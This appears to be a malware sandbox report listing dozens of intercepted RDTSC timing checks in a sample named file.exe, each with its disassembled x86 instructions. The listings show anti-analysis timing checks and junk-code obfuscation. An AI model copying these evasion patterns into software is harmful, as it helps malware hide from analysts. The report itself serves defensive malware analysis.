      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1192560 second address: 1192585 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007FA1BD1DB184h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1192921 second address: 1192934 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1BCFB6B7Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1192934 second address: 119293A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119293A second address: 119293E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11929E7 second address: 11929EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1192BBF second address: 1192BCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1192BCB second address: 1192BD1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119308D second address: 1193097 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FA1BCFB6B76h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11932D6 second address: 11932E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FA1BD1DB176h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11932E0 second address: 11932FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA1BCFB6B84h 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119371A second address: 119371F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1194E62 second address: 1194E66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119613F second address: 119618F instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA1BD1DB18Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov edi, 5FFABFAAh 0x00000012 push 00000000h 0x00000014 sbb esi, 0EC8A047h 0x0000001a push 00000000h 0x0000001c call 00007FA1BD1DB17Ch 0x00000021 mov dword ptr [ebp+122D1EB7h], edi 0x00000027 pop edi 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c jc 00007FA1BD1DB176h 0x00000032 pop eax 0x00000033 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1196C0B second address: 1196C0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11976A0 second address: 11976A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119814F second address: 1198153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119741C second address: 1197422 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1199471 second address: 1199475 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1197422 second address: 1197426 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119CC47 second address: 119CC4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119EAE5 second address: 119EAE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119EAE9 second address: 119EB02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FA1BCFB6B80h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119F9C5 second address: 119FA3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA1BD1DB184h 0x00000008 jmp 00007FA1BD1DB185h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 add dword ptr [ebp+122D260Fh], ebx 0x00000017 push 00000000h 0x00000019 mov edi, dword ptr [ebp+122D3588h] 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push ebp 0x00000024 call 00007FA1BD1DB178h 0x00000029 pop ebp 0x0000002a mov dword ptr [esp+04h], ebp 0x0000002e add dword ptr [esp+04h], 0000001Bh 0x00000036 inc ebp 0x00000037 push ebp 0x00000038 ret 0x00000039 pop ebp 0x0000003a ret 0x0000003b xor edi, 4C2D6046h 0x00000041 xchg eax, esi 0x00000042 jl 00007FA1BD1DB180h 0x00000048 pushad 0x00000049 pushad 0x0000004a popad 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119FA3A second address: 119FA52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 jmp 00007FA1BCFB6B7Dh 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A1B24 second address: 11A1B28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A0ABC second address: 11A0AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A1B28 second address: 11A1B2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A0AC0 second address: 11A0AD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA1BCFB6B7Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A0BBA second address: 11A0BBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A0BBE second address: 11A0BDD instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA1BCFB6B76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FA1BCFB6B7Fh 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A2C26 second address: 11A2C2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A0BDD second address: 11A0BF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1BCFB6B88h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A2C2A second address: 11A2CB7 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA1BD1DB176h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov bx, ax 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007FA1BD1DB178h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 00000019h 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d jmp 00007FA1BD1DB17Bh 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push esi 0x00000037 call 00007FA1BD1DB178h 0x0000003c pop esi 0x0000003d mov dword ptr [esp+04h], esi 0x00000041 add dword ptr [esp+04h], 0000001Dh 0x00000049 inc esi 0x0000004a push esi 0x0000004b ret 0x0000004c pop esi 0x0000004d ret 0x0000004e and bx, 4D5Ch 0x00000053 xchg eax, esi 0x00000054 jmp 00007FA1BD1DB187h 0x00000059 push eax 0x0000005a push esi 0x0000005b push eax 0x0000005c push edx 0x0000005d jne 00007FA1BD1DB176h 0x00000063 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A3D7F second address: 11A3D83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A3D83 second address: 11A3D87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A4C5A second address: 11A4C5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A5C71 second address: 11A5C77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A5C77 second address: 11A5C7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A5C7B second address: 11A5C98 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA1BD1DB176h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jnl 00007FA1BD1DB176h 0x00000016 jnp 00007FA1BD1DB176h 0x0000001c popad 0x0000001d rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A3F15 second address: 11A3F43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1BCFB6B89h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007FA1BCFB6B7Ch 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A3F43 second address: 11A3FED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1BD1DB17Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push esi 0x0000000b mov edi, dword ptr [ebp+122D2CE0h] 0x00000011 pop edi 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov edi, dword ptr [ebp+122D349Ch] 0x0000001f movzx edi, si 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 push 00000000h 0x0000002b push ebx 0x0000002c call 00007FA1BD1DB178h 0x00000031 pop ebx 0x00000032 mov dword ptr [esp+04h], ebx 0x00000036 add dword ptr [esp+04h], 0000001Bh 0x0000003e inc ebx 0x0000003f push ebx 0x00000040 ret 0x00000041 pop ebx 0x00000042 ret 0x00000043 mov eax, dword ptr [ebp+122D08D1h] 0x00000049 jp 00007FA1BD1DB190h 0x0000004f push FFFFFFFFh 0x00000051 push 00000000h 0x00000053 push esi 0x00000054 call 00007FA1BD1DB178h 0x00000059 pop esi 0x0000005a mov dword ptr [esp+04h], esi 0x0000005e add dword ptr [esp+04h], 0000001Dh 0x00000066 inc esi 0x00000067 push esi 0x00000068 ret 0x00000069 pop esi 0x0000006a ret 0x0000006b and bh, FFFFFFAFh 0x0000006e nop 0x0000006f push eax 0x00000070 push edx 0x00000071 push eax 0x00000072 push eax 0x00000073 push edx 0x00000074 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A5E0B second address: 11A5E22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 jp 00007FA1BCFB6B82h 0x0000000f jnl 00007FA1BCFB6B7Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A6E84 second address: 11A6F24 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007FA1BD1DB178h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 0000001Bh 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 sub bx, 1C4Dh 0x00000027 mov dword ptr [ebp+122D35F0h], ecx 0x0000002d push dword ptr fs:[00000000h] 0x00000034 ja 00007FA1BD1DB179h 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 and di, E600h 0x00000046 mov eax, dword ptr [ebp+122D0795h] 0x0000004c push 00000000h 0x0000004e push ebx 0x0000004f call 00007FA1BD1DB178h 0x00000054 pop ebx 0x00000055 mov dword ptr [esp+04h], ebx 0x00000059 add dword ptr [esp+04h], 0000001Bh 0x00000061 inc ebx 0x00000062 push ebx 0x00000063 ret 0x00000064 pop ebx 0x00000065 ret 0x00000066 clc 0x00000067 mov ebx, dword ptr [ebp+122D2843h] 0x0000006d movsx edi, ax 0x00000070 push FFFFFFFFh 0x00000072 push eax 0x00000073 push eax 0x00000074 push edx 0x00000075 push ecx 0x00000076 jmp 00007FA1BD1DB184h 0x0000007b pop ecx 0x0000007c rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A3FED second address: 11A3FF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A7BA6 second address: 11A7BAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A7BAB second address: 11A7BB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A7BB9 second address: 11A7BBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A7BBD second address: 11A7BC7 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA1BCFB6B76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A7BC7 second address: 11A7C42 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FA1BD1DB189h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b jmp 00007FA1BD1DB183h 0x00000010 push 00000000h 0x00000012 mov bh, cl 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007FA1BD1DB178h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 00000014h 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 mov ebx, dword ptr [ebp+122D323Ch] 0x00000036 mov bx, 87BEh 0x0000003a xchg eax, esi 0x0000003b jmp 00007FA1BD1DB186h 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 pushad 0x00000045 popad 0x00000046 pop eax 0x00000047 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A7C42 second address: 11A7C58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1BCFB6B82h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A7DBD second address: 11A7DC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A8DA8 second address: 11A8DD3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FA1BCFB6B78h 0x0000000c popad 0x0000000d push eax 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FA1BCFB6B88h 0x00000016 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AAC39 second address: 11AAC3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AAC3D second address: 11AACF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA1BCFB6B81h 0x0000000b popad 0x0000000c push eax 0x0000000d js 00007FA1BCFB6B8Fh 0x00000013 jmp 00007FA1BCFB6B89h 0x00000018 nop 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007FA1BCFB6B78h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 00000015h 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 jmp 00007FA1BCFB6B7Fh 0x00000038 push 00000000h 0x0000003a add ebx, dword ptr [ebp+122D284Dh] 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push ebp 0x00000045 call 00007FA1BCFB6B78h 0x0000004a pop ebp 0x0000004b mov dword ptr [esp+04h], ebp 0x0000004f add dword ptr [esp+04h], 00000014h 0x00000057 inc ebp 0x00000058 push ebp 0x00000059 ret 0x0000005a pop ebp 0x0000005b ret 0x0000005c xchg eax, esi 0x0000005d jmp 00007FA1BCFB6B80h 0x00000062 push eax 0x00000063 push eax 0x00000064 push edx 0x00000065 jns 00007FA1BCFB6B86h 0x0000006b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AACF2 second address: 11AACF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AF405 second address: 11AF409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AF409 second address: 11AF41F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1BD1DB182h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AF41F second address: 11AF425 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B2FDE second address: 11B2FF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FA1BD1DB17Dh 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B8BAA second address: 11B8BB4 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA1BCFB6B76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B8BB4 second address: 11B8BE6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FA1BD1DB17Fh 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop edx 0x00000011 push esi 0x00000012 jmp 00007FA1BD1DB17Ch 0x00000017 pop esi 0x00000018 popad 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d pushad 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B8BE6 second address: 11B8BFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jnc 00007FA1BCFB6B78h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B8BFE second address: 11B8C02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B8C02 second address: 11B8C08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B8C08 second address: 11B8C0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B8C0E second address: 11B8C12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BDCE1 second address: 11BDCF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 je 00007FA1BD1DB17Ah 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BDF8D second address: 11BDF9A instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA1BCFB6B76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BDF9A second address: 11BDFA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jnp 00007FA1BD1DB176h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BE28F second address: 11BE2B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA1BCFB6B88h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BE2B2 second address: 11BE2CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jp 00007FA1BD1DB178h 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C4528 second address: 11C4544 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1BCFB6B80h 0x00000009 je 00007FA1BCFB6B76h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114DED8 second address: 114DEEA instructions: 0x00000000 rdtsc 0x00000002 je 00007FA1BD1DB176h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007FA1BD1DB17Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C313E second address: 11C3144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C3144 second address: 11C315E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jno 00007FA1BD1DB17Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C315E second address: 11C316F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1BCFB6B7Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C316F second address: 11C318D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jbe 00007FA1BD1DB176h 0x0000000f jmp 00007FA1BD1DB17Dh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C344D second address: 11C3453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C3453 second address: 11C345C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C345C second address: 11C3462 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C3462 second address: 11C3468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
